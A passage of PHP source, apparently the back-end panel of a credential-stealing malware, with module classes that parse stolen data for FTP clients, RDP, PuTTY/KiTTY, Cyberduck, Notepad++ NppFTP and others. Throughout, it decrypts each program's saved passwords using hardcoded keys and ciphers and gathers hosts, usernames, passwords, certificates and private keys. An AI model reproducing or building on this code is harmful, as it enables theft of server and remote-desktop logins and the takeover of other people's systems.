8084. $pos = strpos($line, ',[*');
8085. }
8086. if ($pos !== false)
8087. {
8088. $line = explode(chr(0), stripslashes($this->build_delimiters(substr($line, $pos+3, -2))));
8089. if (is_array($line) && count($line) > 6)
8090. {
8091. $host = $line[1];
8092. $port = $line[2];
8093. $user = $line[3];
8094. $pass = $this->decrypt($line[4]);
8095. $dir = $line[6];
8096. if (count($line) > 52)
8097. $protocol = $line[52];
8098. else
8099. $protocol = '';
8100. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '1'), $port, $dir), $user, $pass);
8101. }
8102. }
8103. }
8104. }
8105. }
8106.  
8107. public function import_item($stream, $id)
8108. {
8109. switch ($id)
8110. {
8111. case 0x0000:
8112. $ini_contents = $stream->read_str();
8113. $this->process_ini_file($ini_contents);
8114. break;
8115. default:
8116. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8117. return false;
8118. }
8119. return true;
8120. }
8121. }
8122.  
8123. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8124. // Easy FTP
8125.  
8126. class module_easyftp extends module
8127. {
8128. protected function process_ftp_file($file_contents)
8129. {
8130. if (substr($file_contents, 0, 2) != ',"')
8131. return;
8132.  
8133. $line = explode(",", trim($file_contents));
8134. if (is_array($line) && count($line) == 4)
8135. {
8136. $host = substr($line[1], 1, -1);
8137. $user = substr($line[2], 1, -1);
8138. $pass = substr($line[3], 1, -1);
8139. $this->add_ftp($host, $user, $pass);
8140. }
8141. }
8142.  
8143. public function import_item($stream, $id)
8144. {
8145. switch ($id)
8146. {
8147. case 0x0000:
8148. $ini_contents = $stream->read_str();
8149. $this->process_ftp_file($ini_contents);
8150. break;
8151. default:
8152. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8153. return false;
8154. }
8155. return true;
8156. }
8157. }
8158.  
8159. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8160. // Xftp
8161.  
8162. class module_xftp extends module
8163. {
8164. private function decrypt($encrypted_password)
8165. {
8166. $decoded_password = base64_decode($encrypted_password, true);
8167. if (!strlen($decoded_password))
8168. return '';
8169.  
8170. $cipher_key = md5('!X@s#c$e%l^l&', true);
8171. return rc4Decrypt($cipher_key, $decoded_password);
8172. }
8173.  
8174. protected function process_ini_file($file_contents)
8175. {
8176. if (strlen($file_contents) <= 4)
8177. return;
8178.  
8179. $parsed_ini = parse_ini($file_contents);
8180.  
8181. $host = '';
8182. $user = '';
8183. $pass = '';
8184. $dir = '';
8185. $port = '';
8186. $protocol = '';
8187.  
8188. if (is_array($parsed_ini))
8189. {
8190. if (is_array($parsed_ini['Connection']))
8191. {
8192. $section = $parsed_ini['Connection'];
8193. $host = assign($section["host"]);
8194. $user = assign($section["username"]);
8195. $pass = $this->decrypt(assign($section["password"]));
8196. $port = assign($section["port"]);
8197. $protocol = assign($section['protocol']);
8198. }
8199.  
8200. if (is_array($parsed_ini['InitialFolder']))
8201. {
8202. $section = $parsed_ini['InitialFolder'];
8203. $dir = assign($section['remote']);
8204. }
8205. }
8206.  
8207. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '1'), $port, $dir), $user, $pass);
8208. }
8209.  
8210. public function import_item($stream, $id)
8211. {
8212. switch ($id)
8213. {
8214. case 0x0000:
8215. $ini_contents = $stream->read_str();
8216. $this->process_ini_file($ini_contents);
8217. break;
8218. default:
8219. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8220. return false;
8221. }
8222. return true;
8223. }
8224. }
8225.  
8226. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8227. // RDP
8228.  
8229. class module_rdp extends module
8230. {
8231. public function import_item($stream, $id)
8232. {
8233. switch ($id)
8234. {
8235. case 0x0000:
8236. case 0x0001:
8237. $rdp_user = ztrim($stream->read_str());
8238. if ($id == 0x0001)
8239. {
8240. $ip = $stream->read_dword();
8241. $rdp_host = strval($ip & 0xff).'.'.
8242. strval(($ip >> 8) & 0xff).'.'.
8243. strval(($ip >> 16) & 0xff).'.'.
8244. strval(($ip >> 24) & 0xff);
8245. }
8246. else
8247. {
8248. $rdp_host = ztrim($stream->read_str());
8249. }
8250. $rdp_pass = ztrim_unicode($stream->read_str());
8251. $rdp_pass = unicode_to_ansi($rdp_pass);
8252. $rdp_host = str_replace('TERMSRV/', '', $rdp_host);
8253.  
8254. $this->add_rdp($rdp_host, $rdp_user, $rdp_pass);
8255. break;
8256. default:
8257. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8258. return false;
8259. }
8260. return true;
8261. }
8262. }
8263.  
8264. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8265. // FTP Now
8266.  
8267. class module_ftpnow extends module
8268. {
8269.  
8270. private function read_xml_item($xml_array)
8271. {
8272. $host = assign($xml_array['ADDRESS']);
8273. $user = assign($xml_array['LOGIN']);
8274. $pass = assign($xml_array['PASSWORD']);
8275. $port = assign($xml_array['PORT']);
8276. $dir = assign($xml_array['REMOTEPATH']);
8277.  
8278. $host = utf8_decode($host);
8279. $user = utf8_decode($user);
8280. $pass = utf8_decode($pass);
8281. $dir = utf8_decode($dir);
8282.  
8283. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
8284.  
8285. foreach ($xml_array as $value)
8286. {
8287. if (is_array($value))
8288. $this->read_xml_item($value);
8289. }
8290. }
8291.  
8292. private function rec_scan_xml_array($xml_array)
8293. {
8294. foreach ($xml_array as $key=>$value)
8295. {
8296. if (is_array($value))
8297. {
8298. if (strpos(strval($key), 'SITE') !== false)
8299. $this->read_xml_item($value);
8300. $this->rec_scan_xml_array($value);
8301. }
8302. }
8303. }
8304.  
8305. private function process_xml($value)
8306. {
8307. if (!strlen($value))
8308. return;
8309. $xml_parser = new XMLParser(utf8_encode($value));
8310. $parsed_xml = $xml_parser->parse();
8311. if (!$xml_parser->isError || is_array($parsed_xml))
8312. {
8313. $this->rec_scan_xml_array($parsed_xml);
8314. } else
8315. {
8316. $this->log->add("ERR_XML_PARSE");
8317. }
8318. }
8319.  
8320. public function import_item($stream, $id)
8321. {
8322. switch ($id)
8323. {
8324. case 0x0000:
8325. $this->process_xml($stream->read_str());
8326. break;
8327. default:
8328. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8329. return false;
8330. }
8331. return true;
8332. }
8333. }
8334.  
8335. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8336. // Robo-FTP
8337.  
8338. class module_roboftp extends module
8339. {
8340. private $host_collector = array();
8341.  
8342. private function process_s_file($value)
8343. {
8344. if (!strlen($value))
8345. return;
8346.  
8347. $pos = stripos($value, 'FTPLOGON');
8348. if ($pos !== false)
8349. {
8350. $login_str = '';
8351. for ($i = $pos; $i < strlen($value); $i++)
8352. {
8353. if ($value[$i] == chr(13) || $value[$i] == chr(10))
8354. break;
8355. $login_str .= $value[$i];
8356. }
8357.  
8358. $pos = strpos($login_str, '/');
8359. $param_str = '';
8360. if ($pos !== false)
8361. {
8362. $param_str = substr($login_str, $pos);
8363. $login_str = substr($login_str, 0, $pos);
8364. }
8365.  
8366. $user = '';
8367. $pass = '';
8368. $port = '';
8369. $protocol = '';
8370.  
8371. // Get host arguments
8372. $params = explode('/', $param_str);
8373.  
8374. foreach ($params as $param)
8375. {
8376. $pair = explode('=', $param);
8377. if (is_array($pair) && count($pair) == 2)
8378. {
8379. $pair[0] = trim($pair[0]);
8380. $pair[1] = trim($pair[1]);
8381. if (strcasecmp($pair[0], 'user') == 0)
8382. $user = $pair[1];
8383. if (strcasecmp($pair[0], 'pw') == 0)
8384. $pass = $pair[1];
8385. if (strcasecmp($pair[0], 'port') == 0)
8386. $port = $pair[1];
8387. if (strcasecmp($pair[0], 'servertype') == 0)
8388. $protocol = strtolower($pair[1]);
8389. if (strcasecmp($pair[0], 'type') == 0)
8390. $protocol = strtolower($pair[1]);
8391. }
8392. }
8393.  
8394. // Extract host
8395. if (($pos = strpos($login_str, '\'')) !== false)
8396. {
8397. $login_str = substr($login_str, $pos+1);
8398. }
8399. if (($pos = strpos($login_str, '\'')) !== false)
8400. {
8401. $login_str = substr($login_str, 0, $pos);
8402. }
8403.  
8404. if (($pos = strpos($login_str, '"')) !== false)
8405. {
8406. $login_str = substr($login_str, $pos+1);
8407. }
8408. if (($pos = strpos($login_str, '"')) !== false)
8409. {
8410. $login_str = substr($login_str, 0, $pos);
8411. }
8412.  
8413. $host = trim($login_str);
8414. $host = trim(substr($host, 9));
8415.  
8416. if (!strlen($host))
8417. {
8418. // No host specified
8419. // Use one of default hosts
8420. foreach ($this->host_collector as $item)
8421. {
8422. $item_user = $user;
8423. if (!strlen($item_user))
8424. $item_user = $item[1];
8425. $this->add_ftp(append_port(ftp_force_ssh($item[0], $protocol == 'sftp'), $port), $item_user, $pass);
8426. }
8427. } else
8428. {
8429. // Use specified host
8430. $this->add_ftp(append_port(ftp_force_ssh($host, $protocol == 'sftp'), $port), $user, $pass);
8431. }
8432. }
8433. }
8434.  
8435. public function import_item($stream, $id)
8436. {
8437. switch ($id)
8438. {
8439. case 0x0000:
8440. case 0x0010:
8441. // Stored sites (registry)
8442. $host = $stream->read_str();
8443. $user = $stream->read_str();
8444. $pass = $stream->read_str();
8445. $port = $stream->read_dword();
8446. $dir = $stream->read_str();
8447.  
8448. if (($id & 0x10) > 0)
8449. $protocol = $stream->read_str();
8450. else
8451. $protocol = '';
8452.  
8453. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 'SFTP (FTP + SSH)'), $port, $dir), $user, $pass);
8454. array_push($this->host_collector, array($host, $user));
8455.  
8456. break;
8457. case 0x0001:
8458. $this->process_s_file($stream->read_str());
8459.  
8460. break;
8461. default:
8462. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8463. return false;
8464. }
8465. return true;
8466. }
8467. }
8468.  
8469. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8470. // Certificate
8471.  
8472. class module_cert extends module
8473. {
8474. public function import_item($stream, $id)
8475. {
8476. switch ($id)
8477. {
8478. case 0x0000:
8479. $cert = $stream->read_str();
8480. $pvt_key = $stream->read_str();
8481.  
8482. $this->add_cert($cert, $pvt_key);
8483.  
8484. break;
8485. default:
8486. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8487. return false;
8488. }
8489. return true;
8490. }
8491. }
8492.  
8493. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8494. // LinasFTP
8495.  
8496. class module_linasftp extends module
8497. {
8498. private function decrypt($encrypted_password)
8499. {
8500. $encrypted_password = trim($encrypted_password);
8501.  
8502. if (strlen($encrypted_password) == 0 || (strlen($encrypted_password) % 3) != 0 || !is_num($encrypted_password))
8503. return '';
8504.  
8505. $result = '';
8506. $XorStr = 'LINASFTP1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ';
8507. $start = int_divide(strlen($encrypted_password), 3);
8508. for ($i = 0; $i < int_divide(strlen($encrypted_password), 3); $i++)
8509. {
8510. $enc_char = intval(substr($encrypted_password, $i*3, 3));
8511. $result .= chr(ord($XorStr[($start+$i)%strlen($XorStr)]) ^ $enc_char);
8512. }
8513.  
8514. return $result;
8515. }
8516.  
8517. public function import_item($stream, $id)
8518. {
8519. switch ($id)
8520. {
8521. case 0x0000:
8522. $host = $stream->read_str();
8523. $user = $stream->read_str();
8524. $pass = $this->decrypt($stream->read_str());
8525.  
8526. $port = $stream->read_str();
8527. $dir = $stream->read_str();
8528.  
8529. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
8530.  
8531. break;
8532. default:
8533. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8534. return false;
8535. }
8536. return true;
8537. }
8538. }
8539.  
8540. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8541. // Cyberduck
8542.  
8543. class module_cyberduck extends module
8544. {
8545. private $pass_keypair = array();
8546.  
8547. private function process_xml($value)
8548. {
8549. if (!strlen($value))
8550. return;
8551. $xml_parser = new XMLParser($value);
8552. $parsed_xml = $xml_parser->parse();
8553. if (!$xml_parser->isError || is_array($parsed_xml))
8554. {
8555. if (isset($parsed_xml['plist']) && is_array($parsed_xml['plist']))
8556. {
8557. $plist = $parsed_xml['plist'];
8558. if (isset($plist['dict']) && is_array($plist['dict']))
8559. {
8560. $dict = $plist['dict'];
8561.  
8562. if (isset($dict['key']) && is_array($dict['key']) &&
8563. isset($dict['string']) && is_array($dict['string']) &&
8564. (count($dict['key']) == count($dict['string'])))
8565. {
8566. $pairs = array();
8567. for ($i = 0; $i < count($dict['key']); $i++)
8568. {
8569. $pairs[$dict['key'][$i]] = $dict['string'][$i];
8570. }
8571.  
8572. $proto = Utf8ToWin(assign($pairs['Protocol']));
8573. $host = Utf8ToWin(assign($pairs['Hostname']));
8574. $user = Utf8ToWin(assign($pairs['Username']));
8575. $pass = Utf8ToWin(assign($this->pass_keypair[$proto.'://'.$user.'@'.$host]));
8576. $port = Utf8ToWin(assign($pairs['Port']));
8577. $dir = Utf8ToWin(assign($pairs['Path']));
8578.  
8579. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $proto == 'sftp'), $port, $dir), $user, $pass);
8580. }
8581. }
8582. }
8583. } else
8584. {
8585. $this->log->add("ERR_XML_PARSE");
8586. }
8587. }
8588.  
8589. public function import_item($stream, $id)
8590. {
8591. switch ($id)
8592. {
8593. case 0x0000:
8594. $xml_file = $stream->read_str();
8595.  
8596. $this->process_xml($xml_file);
8597. break;
8598. case 0x1000:
8599. $url = $stream->read_str();
8600. $pass = $stream->read_str();
8601.  
8602. $this->pass_keypair[Utf8ToWin($url)] = $pass;
8603.  
8604. break;
8605. default:
8606. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8607. return false;
8608. }
8609. return true;
8610. }
8611. }
8612.  
8613. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8614. // Putty
8615.  
8616. class module_putty extends module
8617. {
8618. private function rebuild_table(&$table, $base)
8619. {
8620. $p = 0;
8621. for ($i = 0; $i < strlen($table); $i++)
8622. {
8623. $j = (ord($base[$p])+$i) % strlen($table);
8624. $c = $table[$j];
8625. $table[$j] = $table[$i];
8626. $table[$i] = $c;
8627.  
8628. $p++;
8629.  
8630. if ($p >= strlen($base))
8631. {
8632. $p = 0;
8633. }
8634. }
8635. }
8636.  
8637. private function decrypt($host, $term_type, $encrypted_pass)
8638. {
8639. if (strlen($encrypted_pass) <= 5)
8640. return '';
8641.  
8642. if (!strlen($term_type))
8643. $term_type = 'xterm';
8644.  
8645. $table = 'AZERTYUIOPQSDFGHJKLMWXCVBNazertyuiopqsdfghjklmwxcvbn0123456789+/';
8646. $base = substr($encrypted_pass, 0, 5);
8647. $encrypted_pass = substr($encrypted_pass, 5);
8648.  
8649. $this->rebuild_table($table, $base);
8650.  
8651. $cl = 0;
8652. $decrypted_pass = '';
8653.  
8654. for ($n = 0; $n < strlen($encrypted_pass); $n++)
8655. {
8656. if ($table[strlen($table)-1] == $encrypted_pass[$n])
8657. {
8658. for ($i = 0; $i < strlen($table); $i++)
8659. {
8660. if ($table[$i] == $encrypted_pass[$n])
8661. {
8662. $cl = $cl + $i;
8663. break;
8664. }
8665. }
8666.  
8667. $base = $host.$term_type.'KiTTY';
8668. $this->rebuild_table($table, $base);
8669. continue;
8670. }
8671.  
8672. for ($i = 0; $i < strlen($table); $i++)
8673. {
8674. if ($table[$i] == $encrypted_pass[$n])
8675. {
8676. $decrypted_pass .= chr($cl+$i);
8677. break;
8678. }
8679. }
8680.  
8681. $cl = 0;
8682. }
8683.  
8684. return $decrypted_pass;
8685. }
8686.  
8687. public function import_item($stream, $id)
8688. {
8689. switch ($id)
8690. {
8691. case 0x0000:
8692. $host = $stream->read_str();
8693. $user = $stream->read_str();
8694. $pass = $stream->read_str();
8695.  
8696. $port = $stream->read_str();
8697. if (strlen($port) == 4)
8698. $port = strval(data_int32($port));
8699. else
8700. $port = '';
8701.  
8702. $term_type = $stream->read_str();
8703.  
8704. $pass = $this->decrypt($host, $term_type, $pass);
8705. $this->add_ftp(append_port(ftp_force_ssh($host), $port), $user, $pass);
8706.  
8707. break;
8708. default:
8709. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8710. return false;
8711. }
8712. return true;
8713. }
8714. }
8715.  
8716. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8717. // Notepad++ (NppFTP plugin)
8718.  
8719. class module_notepadpp extends module
8720. {
8721. private $master_pass;
8722.  
8723. // Actually key is NppFTP00, with parity bits unset using des_set_odd_parity
8724. private function decrypt($encrypted_password, $decryption_key = 'OppFTQ11')
8725. {
8726. if (!strlen($encrypted_password))
8727. return '';
8728.  
8729. $encrypted_password = hextostr($encrypted_password);
8730. if ($encrypted_password === false)
8731. return '';
8732.  
8733. $descriptor = mcrypt_module_open(MCRYPT_DES, '', 'ecb', '');
8734.  
8735. if (!$descriptor)
8736. {
8737. $this->log->add("ERR_CANNOT_INITIALIZE_MCRYPT_MODULE");
8738. return '';
8739. }
8740.  
8741. $iv = $decryption_key;
8742.  
8743. mcrypt_generic_init($descriptor, $decryption_key, $iv);
8744.  
8745. $plain_text = decrypt_cfbblock($descriptor, $encrypted_password, $iv);
8746.  
8747. mcrypt_generic_deinit($descriptor);
8748. mcrypt_module_close($descriptor);
8749.  
8750. return $plain_text;
8751. }
8752.  
8753. private function read_xml_item($xml_array)
8754. {
8755. if (isset($xml_array['attributes']) && is_array($xml_array['attributes']))
8756. {
8757. $attr = $xml_array['attributes'];
8758.  
8759. $host = assign($attr['hostname']);
8760. $user = assign($attr['username']);
8761. $pass = assign($attr['password']);
8762. $port = assign($attr['port']);
8763. $dir = assign($attr['initialDir']);
8764. $protocol = assign($attr['securityMode']);
8765.  
8766. $host = utf8_decode($host);
8767. $user = utf8_decode($user);
8768. $pass = $this->decrypt(utf8_decode($pass));
8769. $dir = utf8_decode($dir);
8770. $protocol = utf8_decode($protocol);
8771.  
8772. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '3'), $port, $dir), $user, $pass);
8773. }
8774.  
8775. foreach ($xml_array as $value)
8776. {
8777. if (is_array($value))
8778. $this->read_xml_item($value);
8779. }
8780. }
8781.  
8782. private function read_npp_item($xml_array)
8783. {
8784. if (isset($xml_array['attributes']) && is_array($xml_array['attributes']))
8785. {
8786. $attr = $xml_array['attributes'];
8787.  
8788. $pass = trim(utf8_decode(assign($attr['MasterPass'])));
8789. if ($pass != '')
8790. $this->master_pass = $pass;
8791. }
8792.  
8793. foreach ($xml_array as $value)
8794. {
8795. if (is_array($value))
8796. $this->read_npp_item($value);
8797. }
8798. }
8799.  
8800. private function rec_scan_xml_array($xml_array)
8801. {
8802. foreach ($xml_array as $key=>$value)
8803. {
8804. if (is_array($value))
8805. {
8806. if (strpos(strval($key), 'NppFTP') !== false)
8807. $this->read_npp_item($value);
8808. if (strpos(strval($key), 'Profile') !== false && strlen($this->master_pass) == 0)
8809. $this->read_xml_item($value);
8810. $this->rec_scan_xml_array($value);
8811. }
8812. }
8813. }
8814.  
8815. private function process_xml($value)
8816. {
8817. if (!strlen($value))
8818. return;
8819. $this->master_pass = '';
8820. $xml_parser = new XMLParser(utf8_encode($value));
8821. $parsed_xml = $xml_parser->parse();
8822. if (!$xml_parser->isError || is_array($parsed_xml))
8823. {
8824. $this->rec_scan_xml_array($parsed_xml);
8825. } else
8826. {
8827. $this->log->add("ERR_XML_PARSE");
8828. }
8829. }
8830.  
8831. public function import_item($stream, $id)
8832. {
8833. switch ($id)
8834. {
8835. case 0x0000:
8836. $this->process_xml($stream->read_str());
8837. break;
8838. default:
8839. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8840. return false;
8841. }
8842. return true;
8843. }
8844. }
8845.  
8846. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8847. // CoffeeCup Visual Site Designer
8848.  
8849. class stream_vs_designer extends stream
8850. {
8851. public function read_word_str()
8852. {
8853. if (!$this->state)
8854. return false;
8855. return $this->read_strlen($this->read_word());
8856. }
8857. }
8858.  
8859. class module_vs_designer extends module
8860. {
8861. protected function process_account_data($account_data)
8862. {
8863. if (strlen($account_data) <= 2)
8864. return;
8865.  
8866. $stream = new stream_vs_designer($account_data, $this->log);
8867.  
8868. $ftp_count = $stream->read_word();
8869.  
8870. while ($ftp_count-- && $stream->state && !$stream->eof())
8871. {
8872. $stream->read_word_str(); // Name
8873. $host = $stream->read_word_str(); // Host
8874. $user = $stream->read_word_str(); // User
8875. $pass = $stream->read_word_str(); // Pass
8876. $dir = $stream->read_word_str(); // Dir
8877. $port = $stream->read_word(); // Port
8878. $stream->read_skip(11); // Uknown data
8879.  
8880. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
8881. }
8882. }
8883.  
8884. public function import_item($stream, $id)
8885. {
8886. switch ($id)
8887. {
8888. case 0x0000:
8889. $host = $stream->read_str();
8890. $user = $stream->read_str();
8891. $pass = $stream->read_str();
8892. $port = $stream->read_str();
8893. $dir = $stream->read_str();
8894. if (strlen($port) == 4)
8895. $port = strval(data_int32($port));
8896. else
8897. $port = '';
8898. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
8899. break;
8900. case 0x0001:
8901. $account_data = $stream->read_str();
8902. $this->process_account_data($account_data);
8903. break;
8904. default:
8905. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8906. return false;
8907. }
8908. return true;
8909. }
8910. }
8911.  
8912. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8913. // FTPShell
8914.  
8915. class module_ftpshell extends module
8916. {
8917. protected function process_fsi_file($account_data)
8918. {
8919. if (strlen($account_data) == 0)
8920. return;
8921.  
8922. $lines = parse_lines($account_data);
8923. $state = 0;
8924. foreach ($lines as $line)
8925. {
8926. switch ($state)
8927. {
8928. case 0:
8929. if ($line == '!~*NEWSITE*~!')
8930. {
8931. $state = 1;
8932. $host = '';
8933. $user = '';
8934. $port = '';
8935. }
8936. break;
8937. case 1:
8938. $state = 2;
8939. break;
8940. case 2:
8941. $host = $line;
8942. $state = 3;
8943. break;
8944. case 3:
8945. $port = $line;
8946. $state = 4;
8947. break;
8948. case 4:
8949. $state = 5;
8950. break;
8951. case 5:
8952. $user = $line;
8953. $state = 6;
8954. break;
8955. case 6:
8956. $pass = $line;
8957.  
8958. $this->add_ftp(append_port($host, $port), $user, $pass);
8959.  
8960. $state = 0;
8961. break;
8962. }
8963.  
8964. }
8965.  
8966. }
8967.  
8968. public function import_item($stream, $id)
8969. {
8970. switch ($id)
8971. {
8972. case 0x0000:
8973. $fsi_file = $stream->read_str();
8974. $this->process_fsi_file($fsi_file);
8975. break;
8976. default:
8977. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
8978. return false;
8979. }
8980. return true;
8981. }
8982. }
8983.  
8984. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8985. // FTPInfo
8986.  
8987. class module_ftpinfo extends module
8988. {
8989. private function decrypt($encrypted_password, $decryption_key)
8990. {
8991. if (!strlen($encrypted_password))
8992. return '';
8993.  
8994. $decoded_password = hextostr($encrypted_password);
8995. if ($decoded_password === false)
8996. {
8997. $this->log->add('ERR_INVALID_HEX_STRING');
8998. return '';
8999. }
9000.  
9001. $decrypted_password = '';
9002.  
9003. for ($i = 0; $i < strlen($decoded_password); $i++)
9004. {
9005. $decrypted_password .= chr(ord($decoded_password[$i]) ^ $i ^ ($i+1) ^ ord($decryption_key[$i%strlen($decryption_key)]));
9006. }
9007.  
9008. return $decrypted_password;
9009. }
9010.  
9011. private function read_xml_item($xml_array)
9012. {
9013. $host = utf8_decode(str_replace('&#160;', ' ', assign($xml_array['Address'])));
9014. $user = $this->decrypt(assign($xml_array['Login']), '19De^D$#');
9015. $pass = $this->decrypt(assign($xml_array['Password']), 'qpdm()3-');
9016. $port = utf8_decode(str_replace('&#160;', ' ', assign($xml_array['Port'])));
9017.  
9018. $this->add_ftp(append_port($host, $port), $user, $pass);
9019.  
9020. foreach ($xml_array as $value)
9021. {
9022. if (is_array($value))
9023. $this->read_xml_item($value);
9024. }
9025. }
9026.  
9027. private function rec_scan_xml_array($xml_array)
9028. {
9029. foreach ($xml_array as $key=>$value)
9030. {
9031. if (is_array($value))
9032. {
9033. if (strpos(strval($key), 'data') !== false)
9034. {
9035. $this->read_xml_item($value);
9036. }
9037. $this->rec_scan_xml_array($value);
9038. }
9039. }
9040. }
9041.  
9042. private function process_xml($value)
9043. {
9044. if (!strlen($value))
9045. return;
9046.  
9047. $value = str_replace('encoding="Windows-1251"', 'encoding="UTF-8"', $value);
9048. $xml_parser = new XMLParser(utf8_encode($value));
9049. $parsed_xml = $xml_parser->parse();
9050. if (!$xml_parser->isError || is_array($parsed_xml))
9051. {
9052. $this->rec_scan_xml_array($parsed_xml);
9053. } else
9054. {
9055. $this->log->add("ERR_XML_PARSE");
9056. }
9057. }
9058.  
9059. public function import_item($stream, $id)
9060. {
9061. switch ($id)
9062. {
9063. case 0x0000:
9064. $xml_file = $stream->read_str();
9065. $this->process_xml($xml_file);
9066. break;
9067. default:
9068. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9069. return false;
9070. }
9071. return true;
9072. }
9073. }
9074.  
9075. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9076. // NexusFile
9077.  
9078. class module_nexusfile extends module
9079. {
9080. private function decrypt($cipher_text, $key = 'xxx.xiles.net')
9081. {
9082. $cipher_text = trim($cipher_text);
9083. if (!strlen($cipher_text) || !strlen($key))
9084. return '';
9085.  
9086. $decoded_str = hextostr($cipher_text);
9087. if ($decoded_str === false)
9088. {
9089. // cannot decode hex string, report error
9090. $this->log->add('ERR_INVALID_HEX_STRING');
9091. return '';
9092. }
9093.  
9094. $cipher_text = '';
9095. for ($i = 0; $i < strlen($decoded_str); $i++)
9096. {
9097. $cipher_text .= chr(0).$decoded_str[$i];
9098. }
9099.  
9100. $crypt_array = array();
9101. for ($i = 0; $i < 256; $i++)
9102. {
9103. array_push($crypt_array, $i);
9104. }
9105.  
9106. $tmp_array = array();
9107. for ($i = 0; $i < 256; $i++)
9108. {
9109. array_push($tmp_array, ord($key[$i % strlen($key)]));
9110. }
9111.  
9112. $v = 0;
9113. for ($i = 0; $i < 256; $i++)
9114. {
9115. $v = ($tmp_array[$i] + $crypt_array[$i] + $v) & 0xff;
9116. $t = $crypt_array[$i];
9117. $crypt_array[$i] = $crypt_array[$v];
9118. $crypt_array[$v] = $t;
9119. }
9120.  
9121. $v11 = 0;
9122. $v12 = 0;
9123. $result = '';
9124. for ($i = 0; $i < strlen($cipher_text); $i+=2)
9125. {
9126. $v11 = ($v11 + 1) & 0xff;
9127. $v12 = ($crypt_array[$v11] + $v12) & 0xff;
9128.  
9129. $t = $crypt_array[$v11];
9130. $crypt_array[$v11] = $crypt_array[$v12];
9131. $crypt_array[$v12] = $t;
9132.  
9133. $cipher_wide_char = ((ord($cipher_text[$i]) << 8) | (ord($cipher_text[$i+1]))) ^
9134. $crypt_array[($crypt_array[$v11]+$crypt_array[$v12]) & 0xff];
9135.  
9136. $result .= chr($cipher_wide_char & 0xff).chr(($cipher_wide_char >> 8) & 0xff);
9137. }
9138.  
9139. return unicode_to_ansi($result);
9140. }
9141.  
